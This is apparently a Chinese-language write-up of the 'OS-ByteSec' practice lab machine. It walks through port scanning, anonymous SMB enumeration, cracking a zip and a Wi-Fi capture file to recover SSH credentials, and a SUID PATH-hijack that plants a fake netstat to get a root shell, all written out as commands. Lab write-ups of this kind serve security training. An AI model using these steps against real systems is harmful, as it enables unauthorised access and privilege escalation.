OS-ByteSec

信息搜集

nmap -sV -sC -A 192.168.169.142 先探测一下靶机的端口开放的情况

发现开启了80 139 445 2525端口，其中80是http服务，2525是ssh，139和445是smb，访问网站首页，提示我们smb

漏洞利用

首先来使用smbmap，smbmap -H 192.168.169.142，可以匿名访问但是均无权限

我们这里使用一下enum4linux 来检测一下 enum4linux 192.168.169.142 全方位检测

可以发现三个用户，sagar blackjax smb，继续使用smbmap来列出共享目录，加上-u参数

smbmap -H 192.168.169.142 -u smb 可以列出文件 发现并不需要密码

smbclient 访问 smb 隐藏目录 smbclient //192.168.169.142/smb -U smb

发现当前目录有两个文件，main.txt safe.zip 用get命令下载然后分别看看里面有什么内容。main.txt就只有helo

unzip safe.zip 发现需要密码，使用fcrackzip进行爆破，fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

user.cap里是一些包信息 ，使用aircrack-ng爆破，爆破得到 ESSID 的名字 blackjax KEY snowflake

然后登陆ssh ssh -p 2525 [email protected]

后渗透提权

我们这里使用suid提权，首先查找具有suid的文件

find / -perm -u=s -type f 2>/dev/null

这里有个netscan，运行以后类似于netstat，我们分析一下，发现他是运行netstat -antp命令

1
2
3
4
5
6
7
8

cd /tmp
echo "/bin/sh" > netstat
chmod 777 netstat 
echo $PATH 
export PATH=/tmp:$PATH 
cd /usr/bin 
./netscan
whoami

成功，然后查看我们的/root/root.txt文件

涉及知识点

• 通过SMB获取共享文件；
• 通过爆破获取密码；
• 从user.cap获取账户和密码；
• 利用$PATH变量提权。
• nmap,smbmap.enum4linux,smbclient,fcrackzip,aircrack-ng等工具的利用